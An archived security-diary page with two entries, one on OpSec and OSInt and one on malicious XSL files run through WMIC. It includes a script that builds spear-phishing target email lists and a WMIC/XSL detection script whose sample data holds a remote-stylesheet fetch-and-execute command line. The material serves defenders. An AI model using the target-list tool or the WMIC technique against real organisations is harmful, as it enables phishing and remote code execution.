
Archive for July 6th, 2019

OpSec and OSInt , (Sun, Jul 7th)

Operations security (OpSec) is a military term that has evolved into the InfoSec realm.  In a military context OpSec describes a process that identifies critical information to determine if friendly actions can be learned or observed by enemy intelligence, and if the information obtained by the enemy could be useful to subvert operations.

In the InfoSec realm OpSec is the process of determining what information about an organization is publicly available, and whether that information, individually or in aggregate, could be used by an adversary to damage the organization.

A trivial example of publicly available information being used by the bad guys is spear phishing. A list of company executives taken from the corporate website, combined with the format of the corporate email addresses, is enough to craft and deliver a convincing spear phishing email to a named target.
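As an added illustration of the aggregation point above (this is example code, not part of the original diary): a single published address is enough to infer the corporate naming pattern, and the public leadership page then becomes a target list. The names, the domain and the "known" address are constructed for the example.

```python
"""Turn two public facts (a leadership page and one known address) into a
spear-phishing target list. Added example; names and domain are constructed."""
from __future__ import annotations

import re
import unicodedata

# Constructed: names as they would appear on an "Our leadership" web page.
EXEC_NAMES = ["Jane Q. Doe", "Carlos Álvarez", "Li Wei"]

# Constructed: one address seen in a press release or in PDF metadata.
KNOWN_ADDRESS = ("John Public", "john.public@example.invalid")

# Common corporate local-part conventions, tried in order.
PATTERNS = ["{first}.{last}", "{first}{last}", "{f}{last}", "{f}.{last}",
            "{first}_{last}", "{last}.{first}", "{last}{f}", "{first}"]


def name_parts(full_name: str) -> tuple[str, str, str]:
    """Split a display name into (first, last, first-initial), lower-cased.

    Accents are stripped and middle names/initials dropped, because mail
    systems are almost always provisioned from ASCII first/last pairs.
    """
    ascii_name = (unicodedata.normalize("NFKD", full_name)
                  .encode("ascii", "ignore").decode())
    tokens = re.findall(r"[a-z]+", ascii_name.lower())
    if len(tokens) < 2:
        raise ValueError(f"need at least a first and last name: {full_name!r}")
    return tokens[0], tokens[-1], tokens[0][0]


def render(pattern: str, full_name: str) -> str:
    """Render one pattern for one person, e.g. '{first}.{last}' -> 'jane.doe'."""
    first, last, f = name_parts(full_name)
    return pattern.format(first=first, last=last, f=f)


def infer_pattern(full_name: str, address: str) -> str | None:
    """Find which pattern reproduces the local part of a known address."""
    local = address.partition("@")[0].lower()
    for pattern in PATTERNS:
        if render(pattern, full_name) == local:
            return pattern
    return None  # nickname or non-standard address; pattern unknown


def build_targets(names: list[str], pattern: str, domain: str) -> list[str]:
    """Apply the inferred pattern to every public name."""
    return [f"{render(pattern, name)}@{domain}" for name in names]


if __name__ == "__main__":
    known_name, known_addr = KNOWN_ADDRESS
    domain = known_addr.partition("@")[2]
    pattern = infer_pattern(known_name, known_addr)
    print("inferred pattern:", pattern)
    if pattern:
        for target in build_targets(EXEC_NAMES, pattern, domain):
            print("candidate target:", target)
```

Defenders can run the same script over their own public org chart: every address it produces is one an attacker can produce too, which is a concrete input for deciding what the website should list and whom awareness training should prioritise.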

Open Source intelligence (OSInt) is the process of determining what information is publicly available.

There are many tools available to assist with OSInt, starting with Google, but finding the right tool to sift through the myriad types of information is difficult. An excellent resource for finding those tools is the OSInt Framework, a large mindmap of available OSInt tools classified by the type(s) of data they are useful for.

In the last couple of weeks I stumbled on a creative use of OSInt. A non-profit organization called Trace Labs is using crowdsourced Open Source Intelligence to gather verified information for missing person cases. After a few weeks of information gathering the information is turned over to the police. They have also gamified the OSInt process through virtual capture the flag (CTF) events as well as CTF events at B-Sides and other conferences. Trace Labs' next virtual CTF event is on Saturday, July 13th.

— Rick Wanner MSISE – rwanner at isc dot sans dot edu – http://namedeplume.blogspot.com/ – Twitter:namedeplume (Protected)

(c) SANS Internet Storm Center. https://isc.sans.edu Creative Commons Attribution-Noncommercial 3.0 United States License.

Malicious XSL Files, (Sat, Jul 6th)

In yesterday’s diary entry “A ‘Stream O’ Maldoc”, the payload was an XSL/XSLT file.

Now, malicious XSL files will not execute just by double-clicking them. On a default Windows install, Internet Explorer is launched to display the content of the file as XML.

But in this case, the malicious Word document contains VBA code that launches a WMIC query with the XSL file passed as the stylesheet (the /format: switch).

This results in the execution of the script code inside the XSL file, the technique (known as Squiblytwo) discovered and reported by subTee/Casey Smith last year.

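An added example, not code from the diary or its author: a small triage script covering the two checks a responder would want after reading the above. It confirms whether a recovered XSL file carries an msxsl:script block (the element in which JScript/VBScript lives), and it picks out wmic command lines whose /format: argument is not one of the stock stylesheets that Windows ships in the wbem directory. The XSL fixtures, the sample command lines and the list of stock format names are constructed or assumed for this example.

```python
"""Triage helpers for WMIC /format: stylesheet abuse (XSL script processing).
Added example; fixtures and log lines are constructed, not real samples."""
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
XSLT_NS = "http://www.w3.org/1999/XSL/Transform"

# Constructed fixture: same shape as a script-bearing stylesheet, but the
# script only assigns a string. It is a detection test input, not a payload.
SCRIPT_XSL = f"""<stylesheet xmlns="{XSLT_NS}" xmlns:ms="{MSXSL_NS}"
    xmlns:user="placeholder" version="1.0">
  <output method="text"/>
  <ms:script implements-prefix="user" language="JScript">
    <![CDATA[ var marker = "benign fixture"; ]]>
  </ms:script>
</stylesheet>
"""

# Constructed fixture: an ordinary stylesheet with no script element.
PLAIN_XSL = f"""<stylesheet xmlns="{XSLT_NS}" version="1.0">
  <output method="text"/>
  <template match="/">plain</template>
</stylesheet>
"""


def xsl_script_languages(xsl_text: str) -> list[str]:
    """Return the language of every msxsl:script block, lower-cased.

    MSXML defaults the language to JScript when the attribute is absent.
    An empty list means the stylesheet cannot run script this way.
    """
    root = ET.fromstring(xsl_text)
    return [(el.get("language") or "JScript").lower()
            for el in root.iter(f"{{{MSXSL_NS}}}script")]


# Assumed list of the stock stylesheets under %SystemRoot%\System32\wbem,
# named as wmic accepts them (/format:list resolves to list.xsl). Anything
# else, including an explicit path or URL, is operator-supplied and worth a look.
STOCK_FORMATS = {"csv", "hform", "htable", "hmof", "list", "mof", "rawxml",
                 "table", "texttable", "textvaluelist", "value", "xml"}

WMIC_FORMAT_RE = re.compile(
    r'\bwmic(?:\.exe)?\b.*?/format:\s*(?:"([^"]+)"|(\S+))', re.IGNORECASE)


def wmic_format_target(cmdline: str) -> str | None:
    """Extract the /format: argument from a wmic command line, or None."""
    m = WMIC_FORMAT_RE.search(cmdline)
    if not m:
        return None
    return m.group(1) or m.group(2)


def is_suspicious_format(target: str) -> bool:
    """True when the stylesheet name is not a stock format.

    A trailing .xsl is stripped so '/format:list.xsl' still counts as stock;
    a path or URL never matches a bare stock name and is therefore flagged.
    """
    name = target.strip().lower()
    if name.endswith(".xsl"):
        name = name[:-4]
    return name not in STOCK_FORMATS


# Constructed sample of process-creation command lines (Sysmon EID 1 style).
SAMPLE_CMDLINES = [
    "wmic process list brief /format:list",
    'wmic os get /format:"https://example.invalid/payload.xsl"',
    r'wmic.exe os get /FORMAT:"C:\Users\Public\update.xsl"',
    "wmic os get /format:htable",
    "powershell.exe -NoProfile -c Get-Process",
    r"wmic computersystem get /format:..\..\Temp\t.xsl",
]


def wmic_xsl_suspects(cmdlines: list[str]) -> list[str]:
    """Return the /format: targets that are not stock stylesheets."""
    hits = []
    for line in cmdlines:
        target = wmic_format_target(line)
        if target is not None and is_suspicious_format(target):
            hits.append(target)
    return hits


if __name__ == "__main__":
    print("script languages in fixture:", xsl_script_languages(SCRIPT_XSL))
    print("script languages in plain XSL:", xsl_script_languages(PLAIN_XSL))
    for hit in wmic_xsl_suspects(SAMPLE_CMDLINES):
        print("suspicious wmic /format target:", hit)
```

The stock-name allow-list is deliberately strict: a production rule would also accept explicit paths into the wbem directory, and should be paired with the XSL check, since a stylesheet fetched over HTTP never touches disk under a name you can inspect afterwards.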
Didier Stevens
Senior handler
Microsoft MVP
blog.DidierStevens.com DidierStevensLabs.com
